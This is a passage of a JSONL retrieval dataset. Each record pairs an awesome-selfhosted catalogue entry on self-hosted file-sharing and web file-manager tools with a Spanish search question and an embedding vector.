0.04732, -0.07124, 0.02388, -0.00043, 0.0894, -0.02498, 0.05226, -0.02756, -0.03171, -0.12859, 0.06992, 0.02356, -0.05796, -0.04666, -0.05376, 0.02636, 0.06582, 0.12609, 0.02662, 0.087, 0.01158, -0.06517, 0.01697, -0.05681, 0.04479, 0.10382, -0.02192, 0.00988, -0.09224, -0.05064, -0.06753, -0.0347, -0.08512, 0.02566, 0.02446, -0.00337, -0.00702, -0.07979, 0.06198, -0.04962, 0.00355, 0.0971, -0.09908, 0.04574, -0.0153, -0.01893, -0.05225, -0.02635, -0.01233, -0.05811, 0.04333, 0.04679, -0.02508, -0.09165, 0.10455, -0.01551, -0.05764, -0.09019, 0.06399, 0.00359, -0.04333, -0.13899, -0.01366, -0.07573, -0.02591, 0.11141, 0.03068, 0.01284, -0.05496, -0.04405, 0.08553, -0.07941, -0.00412, 0.06165, -0.00759, 0.04124, -0.06262, -0.02068, -0.05814, -0.00272, 0.00595, 0.00799, 0.03782, 0.03836, -0.00509, 0.07015, 0.01286, -0.17546, 0.08632, 0.00019, -0.04854, -0.04416, -0.01085, 0.00595, -0.05088, -0.02144, 0.02749, 0.05016, -0.07447, -0.0683, 0.06859, -0.0197, -0.02723, 0.07999, -0.06195, 0.02155, -0.08021, 0.07608, 0.02142, -0.05137, -0.05329, 0.03247, -0.00024, -0.02509, -0.05913, -0.07485, -0.05428, 0.03755, 0.02317, -0.05947, -0.00617, 0.03894, 0.0349, -0.00391, -0.01625, 0.04052, 0.08265, -0.09018, 0.0117, 0.03464, 0.04053, -0.01936, -0.05044, -0.00216, -0.02811, 0.08153, 0.08443, 0.0011, -0.01185, 0.01539, 0.02671, 0.0502, 0.00846, 0.05042, -0.02246, 0.04094, 0.00767, -0.00789, 0.04801, -0.04097, 0.03144, 0.03077, -0.04442, -0.02422, -0.00479, 0.0969, 0.04108, 0.00538, -0.07827, -0.03409, -0.0157, 0.00854, 0.03328, -0.08697, -0.04597, 0.01931, 0.03067, 0.01098, -0.01546, -0.00026]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: sE2EEnd β€” End-to-end encrypted file sharing with password protection, download limits, and auto-expiration, integrated with Keycloak for authentication [AGPL-3.0, Docker]. Sharry β€” Share files easily over the internet between authenticated and anonymous users (both ways) with resumable up- and downloads [GPL-3.0, Scala/Java/deb/Docker]. Shifter β€” A simple, self-hosted file-sharing web app, powered by Django [MIT, Docker]. Slink β€” Image sharing platform designed to give users complete control over their media sharing experience [AGPL-3.0, Docker]. snowshare β€” File and link sharing platform with URL shortening, code snippet sharing, and file uploads, featuring customizable expiration, privacy settings, and QR codes [CC0-1.0, Nodejs/Docker]. transfer.sh β€” Easy file sharing from the command line [MIT, Go]. Uguu β€” Stores files and deletes after X amount of time [MIT, PHP].", "indexar": "cual es una alternativa libre a servicios de transferencia de archivos que funcione desde la lΓ­nea de comandos?", "v": [0.03744, 0.09681, -0.12164, -0.11651, -0.00986, -0.14827, 0.02397, -0.0737, -0.1947, -0.02001, -0.14386, -0.22015, 0.05735, -0.01357, 0.10812, -0.02862, 0.13415, -0.04694, 0.09789, -0.06821, -0.08654, -0.00896, 0.00399, -0.06978, -0.06685, -0.02336, 0.08041, -0.05482, -0.148, 0.01571, 0.05306, -0.03711, 0.13088, 0.00239, 0.03814, 0.01904, 0.00586, 0.17586, 0.06656, 0.05876, -0.00134, -0.04469, -0.1113, 0.07352, -0.06429, -0.13288, 0.03884, 0.04349, 0.10977, 0.00155, -0.0443, -0.10986, -0.10647, 0.06416, -0.09054, 0.00815, 0.11448, -0.13285, 0.01047, 0.04592, -0.05447, -0.04693, -0.00035, 0.01828, 0.06302, -0.01993, -0.06178, -0.12908, -0.13814, 0.12402, 0.01349, 0.10217, -0.05951, 0.027, -0.04979, 0.02278, -0.05534, -0.02248, -0.00088, 0.00092, 0.06882, 0.00967, -0.03603, 0.0363, -0.06391, -0.07863, -0.02893, -0.0503, 0.03545, 0.05335, 0.07241, 0.01363, -0.01244, 0.08458, -0.0134, -0.01263, -0.03666, 0.00903, 0.11128, -0.05821, 0.05958, 0.08517, -0.12576, 0.12591, 0.05574, 0.03497, 0.05405, -0.00118, -0.00657, 0.01213, 0.03068, -0.06152, 0.07378, 0.0119, -0.07926, -0.03461, -0.06783, -0.03369, -0.00709, 0.01386, -0.08586, -0.00719, 0.05671, -0.00755, 0.0505, -0.01273, -0.03594, 0.0508, -0.01905, 0.04786, 0.03707, 0.00962, -0.0473, -0.09036, -0.0929, 0.03065, 0.0498, 0.03988, -0.0072, -0.13648, 0.06771, 0.02987, 0.00134, 0.04993, 0.03291, -0.0429, 0.03068, -0.11398, -0.07017, -0.06215, 0.00013, 0.01984, -0.07988, 0.06756, -0.03584, 0.01284, -0.06884, -0.06613, -0.1022, 0.06863, -0.01071, -0.02267, 0.01004, 0.0197, -0.04419, -0.04322, -0.01522, 0.02974, -0.04981, -0.03488, -0.03451, 0.07537, 0.00451, -0.0905, 0.02245, -0.01823, -0.07363, -0.03978, 0.11658, -0.03795, -0.01296, 0.03477, -0.07958, -0.03238, 0.00238, -0.03469, -0.00916, 0.01003, -0.01784, 0.03326, 0.00869, 0.0079, -0.11071, -0.03037, -0.05179, -0.02179, -0.026, -0.03198, -0.06026, -0.083, -0.08166, -0.01145, 0.03132, -0.0374, -0.01277, 0.00193, -0.01037, 0.03179, 0.00226, 0.05563, 0.03995, -0.01967, 0.15226, -0.02204, -0.02295, -0.01264, 0.00068, -0.08416, -0.01469, 0.00595, 0.05025, -0.03315, -0.01807, -0.01121, 0.00027, 0.02838, 0.00813, 0.00877, 0.01047, 0.01256, 0.0157, 0.04537, -0.00706, -0.0311, 0.05124, 0.01747, 0.00071, 0.01396, -0.02465, -0.04925, 0.03261, 0.10078, -0.04479, -0.03102, -0.00061, -0.02882, -0.11752, -0.019, 0.00265, -0.04266, -0.0206, 0.04171, -0.00266, 0.01007, 0.02357, -0.04474]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: XBackBone β€” A simple, fast and lightweight file manager with instant sharing tools integration, like ShareX (a free and open-source screenshot utility for Windows) [AGPL-3.0, PHP/Docker]. Zipline β€” A lightweight, fast and reliable file sharing server that is commonly used with ShareX, offering a react-based Web UI and fast API [MIT, Docker/Nodejs].", "indexar": "que programa puedo usar para subir archivos de forma sencilla y rΓ‘pida?", "v": [-0.02599, 0.04413, -0.26613, -0.15425, -0.05257, -0.12847, -0.04355, -0.15063, -0.0848, -0.06896, -0.15317, -0.16735, -0.00941, -0.08098, -0.05676, -0.08236, 0.03763, -0.07558, 0.07552, 0.0162, 0.09623, -0.01943, -0.0463, -0.14377, -0.06272, 0.00243, 0.10304, 0.09025, -0.1221, -0.09474, 0.01089, 0.09564, 0.06902, 0.0031, -0.0699, 0.02337, 0.06452, 0.02797, -0.02956, -0.00666, -0.00914, 0.03092, -0.05665, 0.02115, -0.0293, 0.03377, 0.06797, -0.03907, -0.02955, -0.047, 0.07529, -0.03552, 0.01282, -0.02379, -0.1033, -0.10656, -0.00317, -0.22313, -0.10358, -0.01508, 0.05009, 0.08275, -0.01591, -0.02373, -0.05643, -0.00282, -0.00772, 0.02773, -0.15241, 0.033, 0.01577, 0.02202, 0.06904, 0.02888, -0.00633, 0.08131, -0.07653, -0.12658, 0.01155, -0.0425, -0.01367, 0.00303, 0.0528, 0.01698, -0.13859, -0.05799, 0.0134, -0.05364, -0.00357, 0.00241, 0.05046, -0.02886, 0.0811, -0.01314, 0.08569, -0.08581, 0.04327, 0.04897, -0.0, -0.0291, 0.0149, -0.07587, -0.0138, 0.201, 0.00792, 0.08085, 0.05688, 0.00337, -0.08975, -0.00793, 0.07814, 0.03279, -0.01667, -0.02723, -0.12559, 0.02873, -0.04121, -0.06938, -0.06657, -0.076, 0.02096, 0.00607, 0.01456, -0.01764, 0.11801, -0.03321, 0.00679, 0.12237, -0.09571, 0.05831, 0.0403, 0.03471, -0.05082, -0.03265, -0.0673, -0.10729, 0.02111, 0.03653, 0.01594, -0.08497, 0.09741, 0.06376, -0.09085, -0.05345, 0.02777, -0.02637, -0.01274, -0.08807, -0.01284, -0.02228, 0.04399, -0.01526, -0.0041, -0.00648, -0.02504, -0.06733, 0.09436, -0.10617, -0.08034, 0.02184, -0.0929, 0.03341, -0.023, -0.00457, 0.00486, -0.07993, 0.06476, 0.00387, 0.03516, 0.03128, 0.03026, 0.06803, 0.02315, -0.08465, 0.0475, 0.01888, -0.094, -0.04896, 0.00565, -0.02359, -0.044, 0.01503, 0.0257, 0.0298, -0.05348, -0.06045, 0.04445, 0.04332, -0.01451, 0.01912, -0.05453, 0.02454, -0.01866, -0.01072, -0.05138, -0.02157, -0.01084, 0.02912, -0.0053, -0.05203, -0.0115, -0.07412, -0.03167, 0.00808, 0.03458, 0.02474, -0.03583, -0.01289, 0.07662, 0.08634, -0.0379, -0.03791, 0.1062, -0.01643, 0.04719, -0.02655, -0.01908, 0.05007, 0.03351, 0.01008, 0.0017, 0.02995, 0.03628, 0.08981, 0.03629, -0.0386, -0.02078, -0.0039, -0.03042, -0.00166, -0.04183, -0.01107, 0.04319, -0.0332, 0.01045, -0.05141, -0.01168, 0.00176, -0.03821, -0.03732, -0.01753, 0.08406, 0.02484, 0.03274, -0.09135, 0.02554, -0.0574, 0.01608, -0.00607, 0.0095, -0.00395, 0.00838, 0.0175, -0.0126, 0.00896, 0.04161]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: XBackBone β€” A simple, fast and lightweight file manager with instant sharing tools integration, like ShareX (a free and open-source screenshot utility for Windows) [AGPL-3.0, PHP/Docker]. Zipline β€” A lightweight, fast and reliable file sharing server that is commonly used with ShareX, offering a react-based Web UI and fast API [MIT, Docker/Nodejs].", "indexar": "cual es una alternativa libre al servicio de intercambio de archivos?", "v": [0.00851, 0.09008, -0.10866, -0.04169, -0.08842, -0.09859, -0.05059, -0.03797, -0.13387, -0.00577, -0.10354, -0.22104, 0.02322, 0.06393, 0.08349, -0.02199, 0.10314, -0.02229, 0.14766, 0.0195, -0.04158, 0.06876, -0.01986, -0.09082, -0.05967, -0.0534, -0.12772, -0.01615, -0.06627, 0.07611, 0.02291, -0.08934, 0.08552, -0.00382, 0.01891, -0.04707, 0.20064, 0.15168, 0.11309, -0.11641, 0.05421, -0.13385, -0.04542, 0.05036, -0.0357, -0.08941, -0.09105, 0.03398, 0.0307, 0.01435, -0.0647, -0.08868, -0.04835, 0.01206, 0.05289, 0.00647, 0.05415, -0.10578, -0.0774, -0.00516, 0.00293, 0.1292, 0.02621, -0.06979, 0.06628, 0.00223, -0.13154, 0.03367, -0.12682, 0.11576, 0.06214, 0.01768, 0.00918, -0.01466, -0.20016, 0.06032, -0.03012, -0.02789, -0.11864, 0.00066, 0.11495, -0.01052, 0.04294, 0.07183, 0.03743, -0.06556, 0.06848, -0.10632, 0.03321, 0.06469, 0.06408, 0.04352, -0.04515, 0.11877, 0.02415, -0.08217, -0.0643, 0.03398, 0.06406, 0.03871, 0.08163, 0.09558, -0.05959, 0.06666, 0.00845, 0.01526, -0.00121, 0.08012, -0.01301, -0.01706, 0.07648, 0.0661, 0.09559, 0.05297, -0.09525, -0.05387, -0.02786, -0.01817, 0.0467, 0.02117, -0.08686, -0.00294, -0.03079, -0.01184, 0.0189, 0.01786, 0.01001, 0.03204, -0.05073, 0.10395, 0.05339, 0.01609, -0.09026, -0.08693, -0.04826, -0.08452, 0.14002, -0.00365, 0.01134, -0.00619, 0.05552, 0.01082, 0.02633, 0.00525, 0.06966, -0.01065, 0.07124, -0.07952, -0.01832, -0.06055, -0.12263, -0.02035, -0.0121, 0.06613, -0.04563, 0.0295, -0.03247, -0.07469, -0.06533, 0.0504, -0.00259, -0.01658, 0.01618, 0.01424, -0.03463, -0.0002, 0.02969, -0.00098, -0.03013, -0.04435, 0.0008, 0.0471, -0.0358, -0.03204, -0.03032, 0.02316, -0.06103, -0.10976, 0.05592, -0.05549, 0.0126, 0.0353, -0.12401, 0.02426, -0.00323, -0.0456, -0.01181, 0.03753, 0.02363, 0.02087, -0.01309, -0.03366, -0.05793, -0.03218, -0.04106, -0.02381, -0.01691, -0.04911, 0.00347, -0.04522, -0.04536, -0.01893, -0.02673, -0.00463, -0.02175, -0.04878, -0.04, -0.00046, 0.03324, 0.02292, 0.02095, -0.02279, 0.16592, -0.00691, -0.06659, -0.02247, 0.01124, -0.07012, 0.03429, -0.0012, 0.05597, 0.02005, 0.0161, -0.01225, -0.01423, 0.02982, 0.02648, 0.03428, -0.01294, 0.03923, -0.05078, 0.05138, 0.01132, 0.00159, 0.07217, 0.02984, -0.02861, -0.00616, -0.01856, -0.07326, 0.03939, 0.05693, -0.06051, -0.01019, -0.00367, 0.01703, -0.07137, -0.02979, -0.00195, -0.02865, -0.00669, 0.05297, 0.02936, 0.02943, 0.05119, -0.0172]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: XBackBone β€” A simple, fast and lightweight file manager with instant sharing tools integration, like ShareX (a free and open-source screenshot utility for Windows) [AGPL-3.0, PHP/Docker]. Zipline β€” A lightweight, fast and reliable file sharing server that is commonly used with ShareX, offering a react-based Web UI and fast API [MIT, Docker/Nodejs].", "indexar": "que herramienta me sirve para compartir archivos instantΓ‘neamente?", "v": [0.16193, 0.12528, -0.09236, -0.18813, 0.0293, -0.15305, -0.15312, -0.07266, 0.02127, -0.04093, -0.03482, -0.06567, 0.00377, -0.0212, 0.06066, 0.14241, 0.16165, -0.01328, 0.05708, -0.04757, -0.00742, 0.05304, -0.12526, -0.09818, -0.10348, -0.05662, 0.02197, 0.06648, -0.18184, 0.03684, -0.0414, -0.02385, 0.04793, -0.03026, -0.08203, -0.10041, 0.04667, 0.0937, -0.08541, 0.03306, -0.00161, 0.1038, -0.04162, 0.09888, 0.01609, 0.00476, -0.0184, 0.02829, 0.00665, 0.12789, -0.02357, -0.1165, -0.06054, 0.06589, -0.10369, -0.07322, 0.16712, -0.20057, 0.00457, -0.06496, -0.12337, 0.084, -0.11204, -0.07359, -0.04117, 0.02114, -0.01606, -0.01919, -0.14881, 0.11406, -0.04442, 0.07007, 0.12181, -0.01464, -0.09356, 0.00209, -0.00731, 0.00493, -0.06186, 0.00606, 0.11247, -0.02704, 0.0242, 0.01985, 0.03008, -0.07499, 0.09011, -0.01404, 0.04091, -0.00218, -0.00899, 0.01243, 0.00298, 0.00109, 0.03194, -0.01559, 0.07737, -0.08064, -0.00673, -0.03638, 0.12344, -0.05702, -0.07515, 0.03424, -0.01087, 0.00214, -0.09484, 0.03715, -0.08214, 0.00944, 0.12118, 0.08111, 0.04737, 0.09225, -0.01786, 0.08098, -0.01538, -0.08306, -0.0229, -0.01639, 0.08082, 0.05356, -0.00906, -0.02782, -0.00867, 0.00485, -0.06158, 0.09253, -0.03604, 0.0061, 0.00721, -0.02974, -0.04455, 0.01465, -0.04258, -0.03176, 0.08865, -0.10061, -0.03893, -0.12568, 0.06441, -0.01886, -0.06116, -0.09012, -0.02113, 0.04103, 0.03257, -0.04464, 0.0321, -0.06247, -0.00133, -0.10001, -0.03179, -0.06525, -0.01391, -0.028, -0.05198, -0.03546, -0.1464, -0.0283, -0.09232, -0.03745, 0.05152, 0.02314, -0.02486, -0.09422, 0.06969, 0.03053, 0.07465, 0.04105, 0.08769, 0.01361, 0.0281, -0.02121, -0.0164, 0.04016, -0.01705, -0.01758, -0.00377, -0.06369, -0.01372, -0.02576, -0.02244, 0.04991, 0.02339, -0.04265, 0.05179, 0.03121, -0.02664, 0.07351, 0.00044, -0.01744, 0.01397, -0.02731, 0.02305, 0.0077, -0.04663, -0.01379, 0.05007, -0.00629, -0.01687, -0.03718, -0.03178, 0.03543, 0.00688, 0.00275, -2e-05, -0.03482, 0.03456, -0.02227, -0.03669, 0.0474, 0.0487, -0.02611, 0.00131, 0.00262, 0.01543, 0.01483, -0.0039, -0.0526, 0.04692, -0.02728, 0.02218, 0.00447, 0.01436, 0.06941, -0.03211, -0.04483, -0.01285, -0.04642, -5e-05, -0.02182, -0.00793, 0.00261, 0.02384, -0.09762, -0.00869, -0.02245, -0.00377, -0.04619, -0.04333, 0.01339, 0.01546, 0.00799, -0.07737, 0.00954, 0.01226, -0.0566, -0.03194, -0.05009, -0.00979, -0.06641, 0.04268, 0.02332, -0.01197, 0.01672]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Apaxy β€” Theme built to enhance the experience of browsing web directories, using the mod_autoindex Apache module and some CSS to override the default style of a directory listing [GPL-3.0, Javascript]. ClyoCloud β€” A personal, self-hosted cloud storage and media management application built for privacy, efficiency, and aesthetics [AGPL-3.0, Nodejs]. copyparty β€” Portable file server with accelerated resumable uploads, deduplication, WebDAV, FTP, zeroconf, media indexer, video thumbnails, audio transcoding, and write-only folders, in a single file with no mandatory dependencies [MIT, Python]. Directory Lister β€” Simple PHP based directory lister that lists a directory and all its sub-directories and allows you to navigate there within [MIT, PHP/Docker]. filebrowser β€” Web File Browser with a Material Design web interface [Apache-2.0, Go]. FileGator β€” FileGator is a powerful multi-user file manager with a single page front-end [MIT, PHP/Docker].", "indexar": "que programa hay para gestionar archivos en internet sin usar servidores costosos?", "v": [0.06051, -0.01949, -0.05309, -0.19902, 0.00168, -0.15223, 0.02075, -0.12404, -0.08765, -0.04145, -0.12313, -0.09088, 0.04102, -0.03299, 0.01162, -0.02274, 0.15205, -0.07484, 0.09805, 0.05409, -0.06484, 0.07029, 0.07246, 0.00015, -0.15353, 0.06238, -0.01391, -0.0899, -0.10207, 0.07058, -0.07627, -0.04912, 0.08127, -0.06824, -0.03296, 0.0173, 0.02684, 0.16563, 0.01147, 0.05461, 0.12646, 0.05442, -0.12208, 0.00356, 0.05375, -0.0225, 0.05417, -0.06308, 0.05894, 0.01328, -0.10126, -0.05911, -0.01112, 0.03205, 0.01519, -0.06015, -0.03446, -0.16971, -0.04204, -0.01118, -0.13706, 0.07348, -0.03579, 0.08025, -0.06673, 0.02858, 0.07855, -0.00619, -0.15296, 0.07363, 0.05417, 0.07915, -0.00313, -2e-05, 0.08244, 0.06259, 0.01286, -0.03841, 0.01736, -0.0247, 0.00089, -0.01881, 0.0362, 0.08485, -0.16553, -0.10373, 0.05771, -0.0122, 0.00558, -0.00275, -0.00296, 0.03192, -0.06932, -0.04657, 0.01348, -0.0093, 0.1533, -0.05661, 0.04233, 0.00998, 0.02202, 0.07458, -0.02159, 0.1179, -0.04988, 0.12903, 0.07885, 0.0095, -0.02251, -0.08961, 0.02892, -0.07572, -0.01965, 0.04336, -0.11223, -0.01389, 0.09445, -0.035, 0.01347, -0.02111, -0.07521, 0.0183, 0.04014, -0.02861, 0.1442, 0.02417, 0.07251, 0.05937, -0.04827, 0.00769, 0.01356, -0.04218, -0.04112, -0.04535, -0.12873, -0.03494, 0.0323, -0.05223, -0.04371, -0.09042, -0.03198, 0.04066, -0.10451, 0.04809, 0.08453, -0.01004, 0.03837, -0.0592, -0.03891, -0.02894, 0.0028, -0.03505, -0.04507, 0.04276, -0.08338, 0.01191, -0.02216, -0.04191, -0.15399, 0.00995, -0.06511, 0.00034, 0.03107, 0.05152, 0.0269, -0.01213, -0.03281, 0.15011, 0.00704, 0.04033, 0.00209, 0.07841, 0.00504, -0.07299, 0.01464, -0.00514, -0.04057, -0.08232, 0.08851, 0.02328, -0.02199, -0.00953, -0.00649, 0.03508, -0.08588, 0.02644, -0.04925, 0.03178, -0.07467, 0.02766, -0.00129, 0.02624, -0.02217, 0.08243, 0.0614, -0.02468, -0.08136, -0.05062, 0.01978, -0.03402, -0.02106, -0.00606, -0.0396, 0.00719, -0.00194, 0.00993, -0.04276, -0.00626, 0.05335, 0.08313, -0.054, -0.04258, 0.03616, -0.04355, 0.00466, -0.01892, 0.05981, -0.03225, -0.02206, 0.02114, -0.00512, 0.03194, -0.03043, 0.05571, 0.06818, 0.01179, 0.01428, -0.00031, -0.01188, -0.03557, -0.04274, -0.02296, -0.04565, -0.01638, -0.04719, -0.06643, 0.01245, -0.05082, -0.07824, -0.05885, -0.07566, 0.11797, 0.01909, -0.00124, -0.00143, -0.08203, -0.0601, 0.01767, -0.01119, 0.01539, 0.02579, -0.00463, -0.01694, 0.03796, 0.00205, 0.0577]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Apaxy β€” Theme built to enhance the experience of browsing web directories, using the mod_autoindex Apache module and some CSS to override the default style of a directory listing [GPL-3.0, Javascript]. ClyoCloud β€” A personal, self-hosted cloud storage and media management application built for privacy, efficiency, and aesthetics [AGPL-3.0, Nodejs]. copyparty β€” Portable file server with accelerated resumable uploads, deduplication, WebDAV, FTP, zeroconf, media indexer, video thumbnails, audio transcoding, and write-only folders, in a single file with no mandatory dependencies [MIT, Python]. Directory Lister β€” Simple PHP based directory lister that lists a directory and all its sub-directories and allows you to navigate there within [MIT, PHP/Docker]. filebrowser β€” Web File Browser with a Material Design web interface [Apache-2.0, Go]. FileGator β€” FileGator is a powerful multi-user file manager with a single page front-end [MIT, PHP/Docker].", "indexar": "con que puedo montar un gestor de carpetas simple basado en la web?", "v": [0.15791, 0.00608, -0.20675, -0.07841, -0.17531, 0.00739, 0.06736, 0.14668, -0.1426, -0.15567, -0.1077, 0.02991, -0.04498, 0.01629, 0.10624, 0.14584, 0.05536, -0.06808, 0.02316, -0.01149, 0.04738, -0.0338, 0.12957, -0.06059, -0.1137, 0.08307, 0.12835, -0.0901, -0.09294, 0.08434, -0.0543, 0.12341, -0.03429, -0.01635, -0.06188, -0.06334, -0.1046, -0.00681, -0.07429, -0.07398, -0.00302, 0.05566, -0.0143, 0.06269, -0.0014, -0.06511, 0.05383, -0.20516, -0.00755, 0.0082, -0.0348, -0.11813, -0.08975, -0.03874, -0.05931, -0.05989, 0.14475, -0.05853, 0.10457, -0.00781, -0.0265, 0.05889, -0.05065, 0.14073, -0.02147, -0.00242, 0.02965, 0.03082, -0.04521, 0.02651, -0.00388, 0.01244, 0.03042, 0.06292, 0.04385, 0.06793, 0.00165, -0.02175, 0.0175, 0.01021, 0.07222, -0.03643, -0.06428, 0.05655, -0.04725, -0.07783, 0.01049, -0.14538, -0.02334, -0.0561, 0.04672, -0.00947, -0.01387, -0.00146, -0.05621, -0.09895, 0.05317, 0.12742, -0.01944, -0.00479, -0.10182, 0.02523, -0.03261, 0.13539, 0.0432, 0.12596, 0.04388, -0.00967, -0.01772, -0.11533, -0.00199, 0.07015, -0.05474, 0.03191, -0.0807, -0.07316, 0.03791, 0.04801, -0.00968, 0.00127, -0.00814, -0.02172, 0.03534, 0.07864, 0.07005, -0.01665, 0.11259, 0.11482, -0.00655, 0.0616, -0.03191, 0.03189, -0.08938, 0.02062, -0.04126, 0.09103, -0.10342, -0.01597, 0.08072, -0.03285, -0.00839, 0.03915, 0.01568, -0.04833, 0.04134, 0.00235, 0.05421, -0.09841, -0.05313, 0.02276, 0.04735, 0.05129, 0.02751, 0.03166, -0.0484, -0.03222, 0.02762, -0.01109, -0.02012, 0.03222, -0.02871, -0.02702, 0.01716, 0.01759, 0.02095, -0.00828, -0.12423, -0.01094, 0.04244, 0.07069, -0.02105, 0.07894, 0.01795, -0.02943, 0.00598, 0.02155, -0.03459, -0.08047, 0.00201, 0.03243, -0.00579, -0.02389, -0.00541, 0.0735, -0.04886, -0.03133, 0.00871, 0.09105, -0.03292, 0.04691, 0.09775, 0.07311, -0.03321, 0.05337, 0.00438, -0.03342, -0.01461, 0.00918, 0.02959, -0.00313, -0.04177, -0.02812, 0.00388, -0.06927, 0.00241, 0.00862, -0.06698, 0.05991, -0.00829, 0.08348, 0.00291, 0.00442, 0.04025, -0.04714, 0.03581, -0.02748, 0.0547, -0.01714, -0.01102, -0.02212, 0.05469, 0.0417, 0.06531, -0.01321, 0.04187, 0.05198, -0.00588, 0.00422, 0.03417, 0.00982, -0.04055, -0.03481, -0.00217, -0.02906, 0.03161, 0.01734, 0.03263, -0.03479, -0.07935, 0.01723, 0.00259, 0.06817, 0.00119, -0.04433, -0.01845, -0.0732, -0.0677, 0.04148, -0.01153, -0.09324, -0.04007, -0.04296, -0.02548, -0.02769, -0.04149, -0.0416]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Apaxy β€” Theme built to enhance the experience of browsing web directories, using the mod_autoindex Apache module and some CSS to override the default style of a directory listing [GPL-3.0, Javascript]. ClyoCloud β€” A personal, self-hosted cloud storage and media management application built for privacy, efficiency, and aesthetics [AGPL-3.0, Nodejs]. copyparty β€” Portable file server with accelerated resumable uploads, deduplication, WebDAV, FTP, zeroconf, media indexer, video thumbnails, audio transcoding, and write-only folders, in a single file with no mandatory dependencies [MIT, Python]. Directory Lister β€” Simple PHP based directory lister that lists a directory and all its sub-directories and allows you to navigate there within [MIT, PHP/Docker]. filebrowser β€” Web File Browser with a Material Design web interface [Apache-2.0, Go]. FileGator β€” FileGator is a powerful multi-user file manager with a single page front-end [MIT, PHP/Docker].", "indexar": "cual es una alternativa libre y portatil para compartir archivos con resumido?", "v": [-0.0002, 0.05068, -0.10403, -0.10217, -0.04942, -0.0934, 0.02352, -0.07337, -0.11354, -0.09061, -0.07955, -0.19385, 0.04289, 0.06733, 0.06573, -0.08404, 0.12054, 0.02008, 0.11942, -0.01613, -0.05541, 0.02916, -0.11702, -0.05332, 0.04014, -0.10969, 0.00716, 0.10953, -0.07432, 0.01388, -0.03928, -0.04063, 0.09431, -0.00679, -0.03296, 0.02731, 0.25139, 0.2256, -0.01834, -0.04272, -0.00409, 0.00194, -0.05148, 0.12889, -0.04877, -0.13081, -0.09749, 0.01725, 0.0356, 0.05233, -0.02431, 0.00219, -0.05046, 0.04296, 0.04244, -0.04503, 0.04507, -0.18846, 0.00831, -0.08436, -0.0474, 0.14098, 0.00328, -0.0307, -0.08635, -0.0146, -0.10118, 0.0865, -0.13026, 0.17198, 0.0953, 0.04989, 0.07472, -0.02922, -0.14708, 0.03664, -0.05959, -0.05052, -0.04984, 0.09232, 0.08407, -0.15644, 0.06554, 0.02429, -0.01302, -0.10715, 0.07875, -0.04575, 0.03671, 0.05649, 0.05045, -0.11314, -0.00205, 0.06133, -0.04494, -0.06668, 0.00282, 0.08227, -0.08263, -0.04348, 0.02468, 0.05667, -0.02179, 0.01238, 0.00275, 0.05138, -0.1059, 0.11738, -0.06059, 0.00341, 0.05535, 0.04229, 0.09808, 0.08066, -0.03182, -0.0025, -0.01744, 0.01507, -0.02901, -0.02834, 0.0251, 0.00948, 0.00903, -0.03703, 0.03132, 0.04777, 0.06034, 0.07077, -0.05438, 0.08537, 0.10798, -0.02126, -0.02634, -0.06557, -0.12219, -0.07706, 0.12847, 0.01009, -0.00581, -0.00752, 0.01853, -0.00499, -0.01203, -0.0, 0.0229, -0.00778, -0.00453, 0.03842, 0.01015, -0.05491, -0.1258, 0.0012, -0.00924, 0.00359, -0.04062, 0.04672, -0.02072, -0.04877, -0.12896, 0.01914, -0.01312, 0.00562, 0.02889, -0.03762, -0.02484, -0.05329, -0.00027, 0.00785, -0.0545, -0.0219, 0.02808, 0.06464, 0.03011, -0.08933, 0.03025, -0.03712, 0.01262, -0.0997, 0.01476, -0.06558, 0.00742, 0.04088, -0.05209, 0.05331, 0.01766, -0.05093, 0.01127, 0.01141, -0.02805, 0.02377, -0.00142, -0.02844, -0.00689, -0.06055, -0.02984, -0.006, -0.02439, -0.03971, -0.0201, 0.03474, -0.018, -0.03888, -0.04273, 0.03991, 0.01358, -0.05816, -0.05501, 0.00761, 0.08545, 0.03397, -0.02185, 0.03095, 0.02219, 